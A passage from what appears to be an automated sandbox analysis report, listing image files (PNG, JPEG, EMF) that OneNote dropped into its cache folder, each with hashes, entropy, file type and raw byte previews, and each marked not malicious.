SHA-512:	5B7D386C46EC75E21DE94DBCA922FB9A6E5358DEB3D60FEEE7B197D739F15D11050825D9323502EDFAF60720F1074DE896B23E71C44D07C9C7E943C31FDC078A
Malicious:	false
Preview:	....l...r...1......^...bX.......^...... EMF........h...................`...E...........................(...F...,... ...EMF+.@..................,...,...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........F...(.......GDIC....s...2...+...^.......F...(.......GDIC....s...2.......N.......F...........EMF+@..$..........?...........?.........@........................(E..HB.'E..HB.0'EI.`B.0'EU5.B.0'E..B.'EU5.B..(EU5.B.(EU5.B..(E..B..(EU5.B..(EI.`B.(E..HB..(E..HB.................@..............!.......b...........$...$......>...........>............'......................%.......................;.......U...P........................T...S...S...S...S8..Si..Ti.@Ti.qT8.qT..qT..@T...T..<.......>.......r...1.......N...............%...........$...$......A...........A............"...........F...........EMF+.@..........F...........GDIC....F...(.......GDIC........2.......N.......F...........EMF+@..$..........?...........?.........@.......................}E

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000006A.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 189 x 305, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	12824
Entropy (8bit):	7.974776104184905
Encrypted:	false
SSDEEP:	384:gzPrAZvq82AP0/DHbSczEegiAh1Hfgr3ZO7EFKWHaXIXqu:erAZz200/TbJzDgiWgjZO7EFKEaXIf
MD5:	2628353534C5AD86CBFE57B6616D46DD
SHA1:	244B7E39D6CEF5B07FCDE80554D31F7DA240BB0D
SHA-256:	69BDB000AC7E030B0B28E6CE78F19547D235355B3B841146951AD1294429FA51
SHA-512:	2529F97BE62DE038445D1C86EE2C01404FB1A2D83A5D16C7B5F4E21723C17EC86FA180DFE10342536CFD7D334EA3AF1FFE151B77F2FBFFFE8E7B2A0C2A3ACD59
Malicious:	false
Preview:	.PNG........IHDR.......1.....).'....sRGB.........pHYs..........+....1.IDATx^.}.w\.n...A.H...E.J...l.......p...\{.w...e.-K.%..d.9..DN...^}..p.L...._$.t...n.=U..ID..]~(.?.)J...-.../.......0V..........'.)1X..c..D..2..A'f."...Ru..R=b..\....\.n.0...7.~".'..s!bd.\|..p.u....-w'.....R.........i]..r....A.........r#...W..f{O.2~C.O........{.....3..W.}e:...~.....4.......t.Mv_....}f..I...x11....d..6.@..O.......f.e..K.....L]..gohj&D..+.....#...#.J...n/]...8~.....zx.'.LI6..W....p...................V.F.. ...y.[.kl<?.^....N..$..7j.biU....c.51{S{.....q....c...<..x..............zG.F.........U.w..fE.....DU.......WG7.5uC...7.....j..7yM...~jU..;J..a\|LoG..x..<^.Z ...Z.....ip....._.4......f.rg..[...z....x1k.....z...K.l...;6.\..Y.#.WT.p.@{W....>.+..*..W....'v.nV...YA[.q!\.\...9..3.[\|....7...HO......2<.....w.,].T^eN..XB.....M3...I.k...e..8...lZ.R...T.%......\|N.w..9..!..O.-p..NA.eD_.d..nW2!...N...z>..;....=t#....H,.N.\|. ......EC..............1.\

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000006C.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	39010
Entropy (8bit):	7.362726513389497
Encrypted:	false
SSDEEP:	768:6tCjwO+E+KW0ZtOgepcoWW4pAWQ6/KWcR474HOAZaDfK:68j+E+KW0HOgep/72/NKWcRNefK
MD5:	9700DE02720CDB5A45EDE51F1A4647EC
SHA1:	CF72A73E1181719B1CC45C2FE0A6B619081E115E
SHA-256:	7E6A7714A69688D9FFDF16AA942B66064A0C77FCD9B3E469F89730B4B9290C3E
SHA-512:	5438921467D62376472007B9EBF3C35C9D9FE3EDE04D99A990129332D53EBC8EE2555C0319A4F7C0DF63516F29CEDF2171D8B6DC34C9FCD075C2CA41EB728660
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.........................................................................................!1..A...Qaq..".......2BR#...b%&6..'w.r.3f7W8.s5EUeF.g....CS$4.Vv..Tdt..G..(c..u.Hhx.......................!1.AQa..2.q....".s...3.4BRr.#......b.$c............?........uf.....t...;..[...W.h.....-.k.f..i.u..KQ..b.F...rM%/.8n.S..=9.....G$O;.f.}L..N..U._i.[.X...3.~....S.~..+t$...c.5......{..X/..#.G...}s....6......^....o~.$.\WA?...^*w[O.~..6..~....a....~..:..0.......{O...\|.s.u._w.........i...........{K...._.?.../{.....A..8....<g.iu..<..................X......\|]v....D..9.k.w.\|-IF.Tv.-.&.........."'.4.b....z.._.Z.....G...u.xyt./_.q..m>..S.V.Xdc.bw.T.W......g..........}s.._..?....U]_.......`......>.\|'.~xH....,...?........?.q....o../..R..;...Y.G....A"?......?.<..1...w..o.M.........tco.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000006E.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	25622
Entropy (8bit):	7.058784902089801
Encrypted:	false
SSDEEP:	384:EhK81gTCyJ/Gf9Aw3t8w8EtdPeGDh6bEi1Ie1u4ZbvgwTwrSRh7ZKNpIGY:IjcRXwdJvtdGsUbEi1IeY8vgwTyC1+Y
MD5:	F8CCFC24DEB1D991EBE085E1B2D7D9BF
SHA1:	AF76C22A765434AEDA134924C517C84107F4FED5
SHA-256:	7354001527AB554C44E7D6981B86DD933B7DC2E0D3DC8512AD3EECD843245C52
SHA-512:	818BC3690B01B30BC571E4CF45EC8D1AFCAECBAB003532644381F1CF730A5B3486862D08F7579B2D3D89167AD7DF35028881245C9550B0DA23D1F81A720A9704
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d........................................................................................!...1A.Qaq.........."2Rr.#.t6..B..3S$4..v.b..Cs.%5..8..cUV.(.DEe.&Ff...T.d.......................!.1A..Qaq...s4....2r..S"BR.3....b#C$.....c............?..D.."}:......&&...?3..W.q.......]...m.Y.k1......K).J...uV.b.../.0.E.H..4..W_T.[t.V.w.9.x.qe.L..o.oL.....d.\.....6.\|.o...}..H{Yn..E...6Y3.l.e..D.:,.n.%...t...m.........,+,..\|..n.....6....f........6.../$../Vi..H...e.f.F.zn.).n.E..2sTn.i...Yb?6+H&...Bf......z.o.^7[..u.:o....t.s=.....(.s.....f.g....q9o.u1L.N...smzE..[>...+\O....j.<....j.c.W.............U..+.F/.'..W...T./W...>i01./....j.s."..Q...{...a._~OW...Rp.).e..W..Q4)<..'..W...q...'..U..z..g......U}...O....w....0F:.N..V.3W.\|..'z0.]...j..U[v..g$D.Lc[.e...UW.m0+

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000006G.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 50 x 500, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	2033
Entropy (8bit):	6.8741208714657
Encrypted:	false
SSDEEP:	48:P37XYSDTz+UUl7DHt7Ah8l1+4ZfFclFUXwobKXlZr:v7j3z+UoDN0h8ugf2AwobMN
MD5:	CA7D2BECCBC3741D73453DCF21D846E0
SHA1:	E34B7788498E33FFF0CFB00125E6BA9E090F6CED
SHA-256:	E9EAD0BFC09D32CB366010CDFEDE1C432A2D1D550CB7332BADAC1BEE9482BC86
SHA-512:	7FE2C3654262B1EEBED4F6D83DA7D3450E1BE52500A3964185FC0092041506A237A2728E5D7EEA0A3814E413E822B803B789C49CF744D51816A2E4EDE5B4247B
Malicious:	false
Preview:	.PNG........IHDR...2.........H'......PLTE........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................[....bKGD....H....cmPPJCmp0712....H.s.....IDATx^.\.W.G...=a.ewA..a.!r( ...%Dc..x.x....N.OO...3=...S...........~.z.D.0...g.2P.7.*M.#'....z.......3TPj.Z.[5....V..z'L3...a.j9..C>..9.z

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000006I.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	55804
Entropy (8bit):	7.433623355028275
Encrypted:	false
SSDEEP:	1536:gVvci05lhVbfBcWvBLeynluexaWqzww/u5:gVUZhHDljaHww/u5
MD5:	4126992F65FE53D3E3E78F6B27FD49DC
SHA1:	BC0D76B69310DA9B909D3EE4CECBFE5F386BFB45
SHA-256:	3FBE3C1C238BD7DBC67F8CFF5F3BDDFD513C96A9851B9616477947D21DFF4B2E
SHA-512:	624853F5E56D224C8188F122B2C4724F867D4099E7FAAFB9C945BE7E2907900ADCF4AE97AB08909CF94E96FB6F381E3B6396D560D93EB2731E4E69CBFE628F10
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d..............................................................................................!1...AQ.aq"2.....BR..8x..r#..9b....3....CS$.'.cs.......7Gw.(.4%5&..Wg.h......tEVfv..H..........................!1A..Qa.q...."2..u6....BRr.#...b..3s..d...7.Cc.$Tt..S4.5Ue..&..%.................?...,...8..{..S.y.N....%..q.8..H[5....o..xg........)c(.eO.YO..._D..x.U.....%.S.r.r._.^..Su.h.Q.t.:.#?....x..B.S...Q.....oqF..%..8'.qx....%.2JKjF..{y.w0.a.RMb.c.Q{%....eW'..[IV..'ZW3...[...MN.....rO.:....$.i..7....Vrrr...I.r..M..Qo..j....q.^...N...J......%.J..)F...>$.....u........o...+......[.....t....R}.I..R..S..GB..:......).6_[^Xft...F.1.....zP....,.#....MG.T..Q.F.....)Fi../.I...,%.voEb.b.Z..V3..FT.}..[Z{....wd.z.e.....QwW(.).t..\..'....:)<W.<..&k...caRT.X(..K.....:f...]...q..

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000006K.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:08:07], baseline, precision 8, 595x450, components 3
Category:	dropped
Size (bytes):	59832
Entropy (8bit):	7.308211468398169
Encrypted:	false
SSDEEP:	1536:HS9SYFtN0+CRa9mfJy4zBAiIJhzrkHDV2hJK:yAmta+Tyy4zBIJW5WK
MD5:	DCDD543A4E0BA2C1909BA095D46FFBCB
SHA1:	B86C89537138FE07255354202D3EAD0B53B3C54D
SHA-256:	28F334B77068F71F5F92A95695433B950610204A0E5580CE567DB8FAD4993ECB
SHA-512:	5408C3259B7F3288A4BEB04342799AD5FE3A6F0EC7E92353B29B7E7E538DFA9903B39637226919E0421BC422635D25F5F8069DC7441864DC03E1B909BF5C2C84
Malicious:	false
Preview:	......JFIF.....H.H.....fExif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:08:07.............................S.......................................................&.(.................................0.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d.................................................................................................................................................y...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?......;R~+'....xh..~.n-}.......Te................^B..IU_....._...S......h.......!....9...A}6V=J......C..c.....Ug.Wh......

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000006M.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	33032
Entropy (8bit):	2.941351060644542
Encrypted:	false
SSDEEP:	384:ofmqvnCfmqsp1Ue5xzMq+Qh0dffUmS0w5xzMq+Qh0di:AGAp1rmSl
MD5:	ACF4A9F470281F475EA45E113E9FB009
SHA1:	B20698DDA5E5AFDD86BB359A6578C9860D5DF71F
SHA-256:	5DC2367A80588A7518DB5014122510BF0FD784711015EF83A8718336584F82D0
SHA-512:	998B7DB9DB08FD15A293267E2371052E436E024AF8D34F96D3C8FF04B1316678DFC1674C921CB404121FF381A4FC39DC759E6698F19D42A6261CBD39469B0A08
Malicious:	false
Preview:	....l...........................Ac...... EMF........$...................`...E...........................(...F...,... ...EMF+.@..................,...,...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........F...(.......GDIC........................F...(.......GDIC............^...........F...........EMF+*@..$..........?...........?.........@..X...L........................."B...B...B...................?...........??.....n............;...<..@<...<...<...<...<...=...=.. =..0=..@=..P=..`=..p=...=...=...=...=...=...=...=...=...=...=...=...=...=...=...=...=...>...>...>...>...>...>...>...>.. >..$>..(>..,>..0>..4>..8>..<>..@>..D>..H>..L>..P>..T>..X>..\>..`>..d>..h>..l>..p>..t>..x>..\|>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...?...?...?...?...?...?

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000006N.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 3005 x 184, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	12180
Entropy (8bit):	5.318266117301791
Encrypted:	false
SSDEEP:	96:k1bHyG/fKOOOOQJUg+g2S+kEm6alfsfsfn32:+bSG/yOOOOQ+g+gOab32
MD5:	5C859FF69B3A271A9AAB08DFA21E8894
SHA1:	3156302A7450ADFF4D1B6EC893E955D3764D4DD4
SHA-256:	B4A8E9A67EE0B897615AC4CCE388FFC175AB92D9E192E6875C79A4E7C1B5BB6E
SHA-512:	4CF518136EEBCA4F400A115D9B7BB0CAC9FA650BF910B99E15F04A259B7D3EFCFFD6796886FE09DB08C37C332B14BC8500845C09C8EAE1F2306F90E98D3C99E0
Malicious:	false
Preview:	.PNG........IHDR..............;j.....sRGB.........pHYs..........+..../9IDATx^...dW...S=.dL$.............-.`...'...x.7.D...(...$.?cO....9S]=.v...Z.......{..wNuf.&.....a.k5~...._..\.yk..v.....}{._.Q...5...._9o.n.....}7.].1v..t......q....3.<..0<.p.......0....s...... @....... @....... @....... @....... @...X.'..U-..... @....... @....... @....... @....... @......,I......+..... @....... @....... @....... @....... @........z...r.. @....... @....... @....... @....... @....... .$.C.KJ[.... @....... @....... @....... @....... @........&`.=X`.%@....... @....... @....... @....... @....... @....../)m.. @....... @....... @....... @....... @....... @ ....`.)....... @....... @....... @....... @....... @....K.0.....J....... @....... @....... @....... @....... @...`.....\.... @....... @....... @....... @....... @......,I......+..... @....... @....... @....... @....... @........z...r.. @....... @....... @....... @....... @....... .$.C.KJ[.... @....... @....... @....... @....... @........&`.=X`.%

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000006P.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 39 x 600, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	2104
Entropy (8bit):	7.252780160030615
Encrypted:	false
SSDEEP:	48:2PPEOtz2P/LJtVRaqBG8qFOPvHlcEXgkuwf+j:2PZFSjJDjqFOPPlXgG+j
MD5:	F6C596F505504044DF1E36BA5DA3F09B
SHA1:	BCF17EC408899B822492B47E307DE638CC792447
SHA-256:	EDBB86F160050FBF1F9860276802BAE292DBFD0BC98E3EA90D43D981E9F0C54A
SHA-512:	E8D067A1932CED8746FE7D665EEC34EA92A98AFF3DF26FFA9DD02742DDEA3C5654124A88A649FA33DB596F96A5FC9CB2C693D03132F1C8B254ACB56DB4763BD8
Malicious:	false
Preview:	.PNG........IHDR...'...X.......:....PLTE.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................{.....bKGD....H....cmPPJCmp0712....H.s.....IDATx^..c.%i.F...m.m.f.m.m.m{&....X...9.....M.WUW.d.N.O...E$...$...)H....n....N.k..v.....v1L[w)w.}..!...Y.X.V.D.......[....;..[..;....

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000006R.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	14177
Entropy (8bit):	5.705782002886174
Encrypted:	false
SSDEEP:	192:EbgGcV/hlvpfal7rgYa8S7auAxwfuSTmCSNoFQ6NO7L:EbgGcVnpwimnd38FdQL
MD5:	7CDCE7EEBF795998DA6CAC11D363291C
SHA1:	183B4CC25B50A80D3EC7CCE4BF445BCFBAA6F224
SHA-256:	DE35AF949D4F83E97EE22F817AFE2531CC4B59FF9EE6026DCA7ECEBC5CF2737F
SHA-512:	560FB15A9C12758D11BB40B742A6EAD755F15AD10D6C5DEBA67F7BC8A2AE67C860831914CBCBCDED9E6B2D1D5F26A636B9BCEF178151F70B4D027316F94F27E1
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d........................................................................................!.1..A....Qa".q..2.....&...B%6.'..R#3.$E.r457bS.DUFV.Wg(.......................1...3.Q..2Rr....s.4.!Aq.S.aC5B$%............?...n.Liq.}.{#....3/gg.1.M +..~3...q..+=..:.g.i1;P)7.....q..n.s"p...wx........v.t.f;..L/..~....y.r[.r.....n.n3..6i..g..}../........3..x.L.i?We..l.......~..<.;..6..o.....N.t.o6.l..~.......<...m.V...Q.7k.u./wq.t..;.I...}..{...>.L..3m..a....yd......6~.f..~Y..}+..<.[w..'-..?.v.7...v.u..4.......1];..u.MO.......s..p..ms.'.O-o...O......m.k.e....)t....i>..E\|....,iOyD\|.{......g.n...cu....=..........h.\.Q:?g/?.I.3._...t...d.n.0.%y....S.Q....S.&K.w..&wY<....%.g.v.....$y..#,i;.=...t...I6..yO..o.d..w\k...~......)..rK.......].u....N....e.s..kU.u..'}

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000006T.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:44:07], progressive, precision 8, 611x163, components 3
Category:	dropped
Size (bytes):	36740
Entropy (8bit):	7.48266872907324
Encrypted:	false
SSDEEP:	768:3nwDxjTvoE0Rjwit4rjucDILWg7/Da0JgGQ8e1S8SA/Khos0:SxjTmZw7nucDILj77a0JgGQvScb
MD5:	9C205C8D770516C5AA70D31B2CA00AF3
SHA1:	9A1002F0CF7F92F1BE2BB25BAD61CEBFAC282482
SHA-256:	E111F96490755C7D71E87C88ACAEA38AFE55BB865B1A14A83C5BD239648D5E2C
SHA-512:	A3E105208B32831265428572B0937DD3C17B793D8611B2DA8D4939F1BEC6050999D375E3F6B87D53AD49DFA0EAE737B0141D37597AA42116C310761973D4A134
Malicious:	false
Preview:	......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:44:07............................c.........................................................(.....................&...........n.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d................................................................................................................................................."...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..o...4.gP.~.c...K{...V.=...].<.........vS.........s....(.t......X......kk7....~-...yF}^c.Z.\.G./.?t...>....:.>......./.ib..).

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000006V.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	53259
Entropy (8bit):	7.651662052139301
Encrypted:	false
SSDEEP:	768:dCiCBBenRYWDBCipMYGTbYGLHbXxoP/qEF+MU50qyJ30h2W474S/Aq/xc4674bi5:dCiIQXBCiwbDLHD0/sFyVel4Pi4UgE
MD5:	2EE369ABB7936F8C28FF0ABDD224EA05
SHA1:	FE9D304A7B49E31EAE439369ABC548E265149636
SHA-256:	FB12D59B8BE911247BBAFDD416852E8B74B028005A141CB4DBBBA109B4B6ED2C
SHA-512:	5CF396CA472C32AE988600176114106CB1619404DD899A3867A5AB43DC90583B771EF69B14EF50E56A21F038BF51D8463C6ADD2DE9D4CB523F6290E24A4DECB3
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d............................................................................................!1..AQa....q........"2..R..Bbr..#S....3$.....C.4v..(X.DtEUV.....cs..Td.5uf'Wgw8Hh........................!1Q.Aa....q.2...."R...r..3.t..U...B#S.4ub..C$d.5Ee&'7c.D%sT..............?.....?...k,lk^...M".Yo5.Qp.&s}b.m.:...W.x}..a......N1..d-n.-..^..b..TZ.W..."....F....^......ve5...^...2.:i...........~u2pK.z./&..u..L[I....Y....@y{\|>..MN=:....Q[..H....a........\|%..4fV....).....^.9b.f...F...p.=.W...aZ.........Z.t.n.....z3..[..lVh..\.N-.._.sK.y.._e.G.jig.a.7^....u....p.5.a.].........u/u..D.yl.XA..f.z..~.x.....N.....b=.uv.2.t.'.N.-.H..n.v.a.A[.Z.....T2...._...:....h..l.E..sm..a.3I...RE...fWb.Ek.0.#.)..Y#T...........u{....U....s.].7_H.2.`O6...P......}..4LR....]4.mid...

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000071.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	60924
Entropy (8bit):	7.758472758205366
Encrypted:	false
SSDEEP:	1536:kU7O7+CFqO6DkxTgPzo2wqggrrX8QvN1I/ZLBttB9+dPFXbc:hVuqJDaTqo2wq1L84N1I/Z1tT9X
MD5:	D58C51D2CF586A5E14A9EC8529C3B0A8
SHA1:	F4811A353797C29B1E3F5A61B125C46E1534D587
SHA-256:	F927C7825851974A2149868146970706523A49165133CEE6027A43E8C9ABDF27
SHA-512:	34B963173AFBDF07432F4B983D29F10376E4771FE666E9D50B1A81DA0B9F6001FD86B4A08B9711386DE153BF6E03C8E932E2D181C8EAF94EFF34D20FCA7570E0
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d................................................................................................!1AQ.aq....".....2B...Rbr#.s.4...3$.5u.6v..CSc...DT..f..t..&F........................!1..A.Qaq....."2....B.s....Rbr..#4...35...CSc.$...DTdt..%..............?....O<......X.O.Fg..{.W&u.u.T~.\|r;g!.._X..N.p.4.........................................................yK..xd...6..\|%....\j..e.=...Y..f..I.\|-....e...$R.j.......~.W#....{.....V.k.\|F..z^..:.~..f......"x.....L..K..r../.;..[..l...;.U...W...X.........8.....y?..B...m.......j..Q.g3..G.K....GL.o..n7a..Y..[.'.........x........\......~...f...0\Wc.n?k.\|.....1.ww;..2..?...r4uF.MXdB6..W..mG2NJ.E........u...2.q...Z..=(l)jU.X...U.\X.......O<......X.O.Fg..{.W&u.u.T~.\|r;g!.._X..N.p.4.......................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000073.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 39 x 579, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	515
Entropy (8bit):	6.740133870626016
Encrypted:	false
SSDEEP:	12:6v/7su2/c30mqkg9VgFHe7Ll8UmJX/N+1Zmkk8f3lbtI4:4mc38gFHe18lkk8f3lbth
MD5:	E96BE30D892A5412CF262FEE652921CA
SHA1:	8190A0BFE21D04BC6F3A406E91B87CA69C03A2DE
SHA-256:	0E31DA4DFCFF4A36C64C1CE940362D2309769F36369E4C43C317D5F2FA15658E
SHA-512:	D647F51ABBD013226A6ADD0D551D058C633F867F9AF5A9E099B85D6E291D220F7B85958B07381CD4C7C4F72356DBAFE2A86932AE398E28C56CDDF0744E92EE24
Malicious:	false
Preview:	.PNG........IHDR...'...C........b...`PLTE..................................................................................................bKGD....H....cmPPJCmp0712....H.s....9IDATx^..I..@.C..<..?mo.#C((.J}...~..B...b.I.i.\<.e.....(p.I.EO...q.x.......dRz....K..b0.:.<c.o..0.x\:...F....I&..ap....."P@....DO...q)p*..@Y.CL2)=......1.........4....._.G..^`..lDO...q...X....SL..z....K..#.L#..I6..ap.Ls.,....7&..ap.p..lI...,GO...q.....k.n1..4......3=.f.x.$..4.....o....x.$+..0.x\.,&6...............IEND.B`.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000075.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 30 x 700, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	1547
Entropy (8bit):	6.4194805172468286
Encrypted:	false
SSDEEP:	24:dZeDNYbS+238CTUFPA6SXG5qSacX9q73eXu0vC3dU+OB2gbwHRuZ:dykp9FzBBacXQ3uNC3n7xuZ
MD5:	0BA36A74DFBF411FAB348404CCEC3348
SHA1:	4C619790E517416E178161028987DF1CD3B871CC
SHA-256:	2E7AAF26BEC32148B96442E8FFF1BD2CEF2D72630969F23B9A2ABEDB6CFEC93B
SHA-512:	90AF53DB7C413E2ADB970AC345F73E4ED8AF626E179C929E6560118F7A9E98DC7C5FF02B2B3F6C98D397E0FE2D85F3427C6928C328872149E176FA8A99E91F54
Malicious:	false
Preview:	.PNG........IHDR...............\....PLTE.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................D......bKGD....H....cmPPJCmp0712....H.s.....IDATx^.WSTA........b.0gPPP0..E.9b@L(.c.N.U>..@......;...}..B.(....$......5..XS...I....).!....D^.uE...\..5........F."o..-...m.n. .^.....q= .

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000077.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	95763
Entropy (8bit):	7.931689087616878
Encrypted:	false
SSDEEP:	1536:EoES7mhTyzabUaE77xAOmq0zVruQlttNxlipxVWssMU2YhRy2v6pKKYhQzwMc2:zz7mhTyzabUa4b4xuQlttnlGx8x9h02M
MD5:	177DD42CA99CAA2CCBF2974221680334
SHA1:	35FD86B3DD082A6D4930C67BC0E05D3B5817465A
SHA-256:	525A857D0EDA855A64D3619DF58B1C2D013A73E60FA0D49B155ECFCB2C134C7C
SHA-512:	6FB6D9A6C97B1115C3246690A2F339CD612899AC25ACBA00296EAEAA0A1D094E7339D670969764FE23EB7C08FCDD01C6F78FBC0735D504D5E02AD342901719B3
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d........................................................................................!..1AQa...q......."...2..B#Rb3..r$...6..C4....Ss%5...tu.c..Dd.EU7....................!.1.AQ..aq......"r..2...4Rb#3$B.Ss............?..H..dV....U..-..0]Cp.%O.Z.Y.e.=/.q.....j76.w@s...5.&&&5...n..w..>.1....;.vR..[.......=.......KtY]u3.g18...).r....&.IZ'.....g..4kY..X..b.......y<...r1........e.._...X...w....op.m%Jr31...S.Vo.._....OI\]....F..V-....\...2j..X.....y.p.$4.....&#..]..n.V..x..P...F..C.f....])..~..Z\.....,..#..v..v...2V.k.SuaydO../[.c._..oTV<Z.s.[...o.x..>....-....v...#....-.X..L.Z./#.XG.-.0......%w..H.@aZ....C.}...N~.;..R......5.D......I.... .R........s.>..ks....(...S...9....2=. :^.. p.+?(....$..Q..I.........=\|..`2. v..t......U.8.u.. ...'...*...2;u....& 3..$.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000079.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	67991
Entropy (8bit):	7.870481231782746
Encrypted:	false
SSDEEP:	1536:3PC0XJjsmsKuZRG1pXuZ6z3wARnV9AEnieCc7cllJcHJ:qyMBzkUZ0gq25c7Z
MD5:	1271B1905D18A40D79A5B9DB27EE97EA
SHA1:	9618608FBD7342DE6C71220A36C3F4995BA9C13E
